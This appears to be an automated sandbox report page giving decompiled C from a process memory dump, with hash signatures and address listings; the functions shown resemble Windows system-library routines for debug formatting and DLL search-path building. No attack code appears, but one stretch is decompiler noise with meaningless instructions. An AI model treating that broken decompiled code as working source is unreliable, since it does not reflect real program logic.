                                                0x0160baa9
                                                0x0160baa9
                                                0x0160baa9
                                                0x0160bab1
                                                0x01652cd5
                                                0x01652cdd
                                                0x01652cdd
                                                0x0160babb
                                                0x0160babc
                                                0x0160bac2
                                                0x0160bac3
                                                0x0160bac3
                                                0x0160bac6
                                                0x00000000
                                                0x0160b9dd
                                                0x0160b9dd
                                                0x0160b9e7
                                                0x0160b9e7
                                                0x0160b9ec
                                                0x0160b9ec
                                                0x0160b9f1
                                                0x0160b9f5
                                                0x0160b9fa
                                                0x0160ba00
                                                0x0160ba0c
                                                0x0160ba10
                                                0x0160ba10
                                                0x0160ba12
                                                0x0160ba18
                                                0x00000000
                                                0x00000000
                                                0x0160bb26
                                                0x0160bb26
                                                0x0160ba1e
                                                0x0160ba1e
                                                0x0160ba23
                                                0x0160ba25
                                                0x0160ba2c
                                                0x0160ba30
                                                0x0160ba35
                                                0x0160ba35
                                                0x0160ba41
                                                0x0160ba46
                                                0x0160ba4c
                                                0x0160ba50
                                                0x0160ba54
                                                0x0160ba6a
                                                0x0160ba6e
                                                0x0160ba70
                                                0x0160ba74
                                                0x0160ba78
                                                0x0160ba7a
                                                0x0160ba7c
                                                0x0160ba8e
                                                0x0160ba90
                                                0x0160ba92
                                                0x0160bb14
                                                0x0160bb14
                                                0x0160bb16
                                                0x0160bb16
                                                0x00000000
                                                0x0160ba7c
                                                0x0160bb0a
                                                0x0160bb0d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0160bb0f

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0160B9A5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 885266447-0
                                                • Opcode ID: cdbfbd7c7425b67617a455f7c975de540ecfc719f992ea052527877b340b4ed7
                                                • Instruction ID: 13438eaac209f32e20bbf09a38e026a893c065f3f083cdcf6e23d291a26145b9
                                                • Opcode Fuzzy Hash: cdbfbd7c7425b67617a455f7c975de540ecfc719f992ea052527877b340b4ed7
                                                • Instruction Fuzzy Hash: FD516C75A08751CFC726CF6DC88092BBBF9FB88610F14896EE99587385D730E840CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015EB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E015EB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x16bf7a8);
				E0163D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0163D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0162D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0162F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0163DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0162B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0162B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0162E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0162A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                0x015eb171
                                                0x015eb171
                                                0x015eb171
                                                0x015eb171
                                                0x015eb171
                                                0x015eb176
                                                0x015eb17b
                                                0x015eb180
                                                0x015eb186
                                                0x015eb18f
                                                0x015eb198
                                                0x015eb1a4
                                                0x015eb1aa
                                                0x01644802
                                                0x01644802
                                                0x01644805
                                                0x0164480c
                                                0x0164480e
                                                0x015eb1d1
                                                0x015eb1d3
                                                0x015eb1de
                                                0x015eb1de
                                                0x01644817
                                                0x0164481e
                                                0x01644820
                                                0x01644822
                                                0x01644822
                                                0x01644824
                                                0x01644824
                                                0x0164482a
                                                0x00000000
                                                0x00000000
                                                0x01644835
                                                0x0164483a
                                                0x0164483d
                                                0x0164483f
                                                0x01644842
                                                0x01644842
                                                0x01644842
                                                0x01644846
                                                0x0164484c
                                                0x0164484e
                                                0x01644851
                                                0x01644851
                                                0x01644853
                                                0x01644854
                                                0x01644854
                                                0x01644858
                                                0x0164485a
                                                0x0164485a
                                                0x0164485d
                                                0x0164485f
                                                0x01644861
                                                0x01644861
                                                0x01644866
                                                0x0164486b
                                                0x0164486e
                                                0x01644871
                                                0x01644876
                                                0x01644876
                                                0x01644878
                                                0x0164487b
                                                0x01644884
                                                0x01644884
                                                0x00000000
                                                0x0164487d
                                                0x0164487d
                                                0x01644882
                                                0x01644889
                                                0x01644889
                                                0x0164488f
                                                0x01644891
                                                0x016448e0
                                                0x016448e2
                                                0x016448e4
                                                0x016448e4
                                                0x016448e7
                                                0x016448e7
                                                0x016448ed
                                                0x016448f4
                                                0x016448f6
                                                0x01644951
                                                0x01644951
                                                0x01644953
                                                0x01644953
                                                0x01644956
                                                0x01644956
                                                0x01644958
                                                0x01644959
                                                0x01644959
                                                0x0164495d
                                                0x0164495d
                                                0x0164495f
                                                0x0164495f
                                                0x01644965
                                                0x01644969
                                                0x016449ba
                                                0x016449ba
                                                0x016449c1
                                                0x016449c5
                                                0x016449cc
                                                0x016449d4
                                                0x016449d7
                                                0x016449da
                                                0x016449e4
                                                0x016449e5
                                                0x016449f3
                                                0x01644a02
                                                0x00000000
                                                0x01644a02
                                                0x01644972
                                                0x01644974
                                                0x00000000
                                                0x00000000
                                                0x01644976
                                                0x01644979
                                                0x01644982
                                                0x01644983
                                                0x01644984
                                                0x0164498b
                                                0x0164498d
                                                0x01644991
                                                0x01644993
                                                0x01644999
                                                0x0164499d
                                                0x016449a2
                                                0x016449a2
                                                0x016449a2
                                                0x01644999
                                                0x016449ac
                                                0x00000000
                                                0x016449b3
                                                0x016448f8
                                                0x016448fe
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016448fe
                                                0x01644895
                                                0x0164489c
                                                0x016448ad
                                                0x016448b2
                                                0x016448b5
                                                0x016448b7
                                                0x016448ba
                                                0x016448bc
                                                0x016448c6
                                                0x016448c6
                                                0x016448cb
                                                0x016448d1
                                                0x016448d4
                                                0x016448d8
                                                0x016448d8
                                                0x00000000
                                                0x016448d8
                                                0x016448be
                                                0x016448c0
                                                0x00000000
                                                0x00000000
                                                0x016448c2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016448c4
                                                0x00000000
                                                0x01644882
                                                0x0164487b
                                                0x01644904
                                                0x01644906
                                                0x00000000
                                                0x00000000
                                                0x01644908
                                                0x0164490e
                                                0x00000000
                                                0x00000000
                                                0x01644910
                                                0x01644917
                                                0x01644917
                                                0x00000000
                                                0x01644917
                                                0x015eb1ba
                                                0x016447f9
                                                0x016447fc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016447fc
                                                0x015eb1c0
                                                0x015eb1c0
                                                0x015eb1c3
                                                0x015eb1cb
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: _vswprintf_s
                                                • String ID:
                                                • API String ID: 677850445-0
                                                • Opcode ID: 633fc353151591f46cf241ff4fca4194aa431a5ed4944c83b97d6ccdcb052d35
                                                • Instruction ID: 6ebd4368a7cd29280abeb695725bea2b5b4e8851b42523277293a8c328d68c44
                                                • Opcode Fuzzy Hash: 633fc353151591f46cf241ff4fca4194aa431a5ed4944c83b97d6ccdcb052d35
                                                • Instruction Fuzzy Hash: 2351C175D002698FEB35CF688C46BAEBBB1BF01714F1141ADD859AB382DB708941DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01612581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E01612581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t235;
				signed int _t239;
				char* _t240;
				signed int _t244;
				signed int _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t258;
				signed int _t261;
				signed int _t269;
				intOrPtr _t275;
				signed int _t277;
				signed int _t279;
				void* _t280;
				void* _t281;
				signed int _t282;
				unsigned int _t285;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t295;
				intOrPtr _t307;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t323;
				signed int _t324;
				intOrPtr* _t326;
				signed int _t328;
				signed int _t330;
				signed int _t333;
				void* _t334;
				void* _t336;

				_t330 = _t333;
				_t334 = _t333 - 0x4c;
				_v8 =  *0x16dd360 ^ _t330;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t323 = 0x16db2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t285 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t275 = 0x48;
				_t305 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t316 = 0;
				_v37 = _t305;
				if(_v48 <= 0) {
					L16:
					_t45 = _t275 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t324 = 0xc0000106;
						goto L32;
					} else {
						_t323 = L01604620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
						_v52 = _t323;
						__eflags = _t323;
						if(_t323 == 0) {
							_t324 = 0xc0000017;
							goto L32;
						} else {
							 *(_t323 + 0x44) =  *(_t323 + 0x44) & 0x00000000;
							_t50 = _t323 + 0x48; // 0x48
							_t318 = _t50;
							_t305 = _v32;
							 *((intOrPtr*)(_t323 + 0x3c)) = _t275;
							_t277 = 0;
							 *((short*)(_t323 + 0x30)) = _v48;
							__eflags = _t305;
							if(_t305 != 0) {
								 *(_t323 + 0x18) = _t318;
								__eflags = _t305 - 0x16d8478;
								 *_t323 = ((0 | _t305 == 0x016d8478) - 0x00000001 & 0xfffffffb) + 7;
								E0162F3E0(_t318,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
								_t305 = _v32;
								_t334 = _t334 + 0xc;
								_t277 = 1;
								__eflags = _a8;
								_t318 = _t318 + (( *_t305 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t269 = E016739F2(_t318);
									_t305 = _v32;
									_t318 = _t269;
								}
							}
							_t289 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t324 = _v68;
								__eflags = 0;
								 *((short*)(_t318 - 2)) = 0;
								goto L32;
							} else {
								_t279 = _t323 + _t277 * 4;
								_v56 = _t279;
								do {
									__eflags = _t305;
									if(_t305 != 0) {
										_t235 =  *(_v60 + _t289 * 4);
										__eflags = _t235;
										if(_t235 == 0) {
											goto L30;
										} else {
											__eflags = _t235 == 5;
											if(_t235 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t279 =  *(_v60 + _t289 * 4);
										 *(_t279 + 0x18) = _t318;
										_t239 =  *(_v60 + _t289 * 4);
										__eflags = _t239 - 8;
										if(_t239 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t239 * 4 +  &M01612959))) {
												case 0:
													__ax =  *0x16d8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0162F3E0(__edi,  *0x16d848c, __ax & 0x0000ffff);
														__eax =  *0x16d8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0162F3E0(_t318, _v80, _v64);
													_t264 = _v64;
													goto L26;
												case 2:
													 *0x16d8480 & 0x0000ffff = E0162F3E0(__edi,  *0x16d8484,  *0x16d8480 & 0x0000ffff);
													__eax =  *0x16d8480 & 0x0000ffff;
													__eax = ( *0x16d8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0162F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0162F3E0(_t318, _v76, _v36);
														_t264 = _v36;
													}
													L26:
													_t334 = _t334 + 0xc;
													_t318 = _t318 + (_t264 >> 1) * 2 + 2;
													__eflags = _t318;
													L27:
													_push(0x3b);
													_pop(_t266);
													 *((short*)(_t318 - 2)) = _t266;
													goto L28;
												case 6:
													__ebx = "\\Wow\\Wow";
													__eflags = __ebx - "\\Wow\\Wow";
													if(__ebx != "\\Wow\\Wow") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0162F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\Wow\\Wow";
														} while (__ebx != "\\Wow\\Wow");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x16d8478 & 0x0000ffff = E0162F3E0(__edi,  *0x16d847c,  *0x16d8478 & 0x0000ffff);
													__eax =  *0x16d8478 & 0x0000ffff;
													__eax = ( *0x16d8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E016739F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x16d6e58 & 0x0000ffff = E0162F3E0(__edi,  *0x16d6e5c,  *0x16d6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x16d6e58 & 0x0000ffff;
													__eax = ( *0x16d6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t289 = _v16;
													_t305 = _v32;
													L29:
													_t279 = _t279 + 4;
													__eflags = _t279;
													_v56 = _t279;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t289 = _t289 + 1;
									_v16 = _t289;
									__eflags = _t289 - _v48;
								} while (_t289 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t239 =  *(_v60 + _t316 * 4);
						if(_t239 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t239 * 4 +  &M01612935))) {
							case 0:
								__ax =  *0x16d8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t305 =  &_v64;
								_v80 = E01612E3E(0,  &_v64);
								_t275 = _t275 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x16d8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x16d8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E015FEEF0(0x16d79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E015FEB70(__ecx, 0x16d79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t213 = _v72;
											__eflags = _t213;
											if(_t213 != 0) {
												L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
											}
											_t214 = _v52;
											__eflags = _t214;
											if(_t214 != 0) {
												__eflags = _t324;
												if(_t324 < 0) {
													L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
													_t214 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t285 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x16d7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E015FEB70(__ecx, 0x16d79a0);
										__eax = _v52;
										L36:
										_pop(_t317);
										_pop(_t325);
										__eflags = _v8 ^ _t330;
										_pop(_t276);
										return E0162B640(_t214, _t276, _v8 ^ _t330, _t305, _t317, _t325);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t271 = _v56;
								if(_v56 != 0) {
									_t305 =  &_v36;
									_t273 = E01612E3E(_t271,  &_v36);
									_t285 = _v36;
									_v76 = _t273;
								}
								if(_t285 == 0) {
									goto L44;
								} else {
									_t275 = _t275 + 2 + _t285;
								}
								goto L14;
							case 6:
								__eax =  *0x16d5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x16d8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x16d8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x16d6e58 & 0x0000ffff;
								__eax = ( *0x16d6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t316 = _t316 + 1;
								if(_t316 >= _v48) {
									goto L16;
								} else {
									_t305 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t290 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("popad");
					 *((intOrPtr*)(_t323 + 0x28)) =  *((intOrPtr*)(_t323 + 0x28)) + _t334;
					asm("popad");
					_t240 = _t239 + _t334;
					asm("daa");
					asm("popad");
					 *_t323 =  *_t323 + _t330;
					asm("popad");
					 *((intOrPtr*)(_t323 + 0x28)) =  *((intOrPtr*)(_t323 + 0x28)) + _t240;
					asm("popad");
					 *0x1f016126 =  *0x1f016126 + _t240;
					_pop(_t280);
					 *[gs:eax+ebp+0x5b350161] =  *[gs:eax+ebp+0x5b350161] + _t305;
					 *[gs:edx] =  *[gs:edx] + _t240;
					 *((intOrPtr*)(_t290 + 1)) =  *((intOrPtr*)(_t290 + 1)) - _t334;
					 *_t240 =  *_t240 - 0x61;
					_t326 = _t323 + _t323;
					asm("daa");
					asm("popad");
					 *_t326 =  *_t326 + _t280;
					 *((intOrPtr*)(_t290 + 1)) =  *((intOrPtr*)(_t290 + 1)) - _t240;
					_t327 = _t326 - 1;
					 *((intOrPtr*)(_t290 + 1)) =  *((intOrPtr*)(_t290 + 1)) - _t240;
					asm("daa");
					asm("popad");
					_pop(_t281);
					 *[gs:eax+ebp+0x5c340161] =  *[gs:eax+ebp+0x5c340161] + _t326 - 1;
					_t336 = _t334 + _t290;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x16bff00);
					E0163D08C(_t281, _t318, _t327);
					_v44 =  *[fs:0x18];
					_t319 = 0;
					 *_a24 = 0;
					_t282 = _a12;
					__eflags = _t282;
					if(_t282 == 0) {
						_t244 = 0xc0000100;
					} else {
						_v8 = 0;
						_t328 = 0xc0000100;
						_v52 = 0xc0000100;
						_t246 = 4;
						while(1) {
							_v40 = _t246;
							__eflags = _t246;
							if(_t246 == 0) {
								break;
							}
							_t295 = _t246 * 0xc;
							_v48 = _t295;
							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x15c1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t261 = E0162E5C0(_a8,  *((intOrPtr*)(_t295 + 0x15c1668)), _t282);
									_t336 = _t336 + 0xc;
									__eflags = _t261;
									if(__eflags == 0) {
										_t328 = E016651BE(_t282,  *((intOrPtr*)(_v48 + 0x15c166c)), _a16, _t319, _t328, __eflags, _a20, _a24);
										_v52 = _t328;
										break;
									} else {
										_t246 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t246 = _t246 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t328;
						__eflags = _t328;
						if(_t328 < 0) {
							__eflags = _t328 - 0xc0000100;
							if(_t328 == 0xc0000100) {
								_t291 = _a4;
								__eflags = _t291;
								if(_t291 != 0) {
									_v36 = _t291;
									__eflags =  *_t291 - _t319;
									if( *_t291 == _t319) {
										_t328 = 0xc0000100;
										goto L76;
									} else {
										_t307 =  *((intOrPtr*)(_v44 + 0x30));
										_t248 =  *((intOrPtr*)(_t307 + 0x10));
										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t291;
										if( *((intOrPtr*)(_t248 + 0x48)) == _t291) {
											__eflags =  *(_t307 + 0x1c);
											if( *(_t307 + 0x1c) == 0) {
												L106:
												_t328 = E01612AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
												_v32 = _t328;
												__eflags = _t328 - 0xc0000100;
												if(_t328 != 0xc0000100) {
													goto L69;
												} else {
													_t319 = 1;
													_t291 = _v36;
													goto L75;
												}
											} else {
												_t251 = E015F6600( *(_t307 + 0x1c));
												__eflags = _t251;
												if(_t251 != 0) {
													goto L106;
												} else {
													_t291 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t328 = E01612C50(_t291, _a8, _t282, _a16, _a20, _a24, _t319);
											L76:
											_v32 = _t328;
											goto L69;
										}
									}
									goto L108;
								} else {
									E015FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t328 = _a24;
									_t258 = E01612AE4( &_v36, _a8, _t282, _a16, _a20, _t328);
									_v32 = _t258;
									__eflags = _t258 - 0xc0000100;
									if(_t258 == 0xc0000100) {
										_v32 = E01612C50(_v36, _a8, _t282, _a16, _a20, _t328, 1);
									}
									_v8 = _t319;
									E01612ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t244 = _t328;
					}
					L70:
					return E0163D0D1(_t244);
				}
				L108:
			}






















































                                                0x01612584
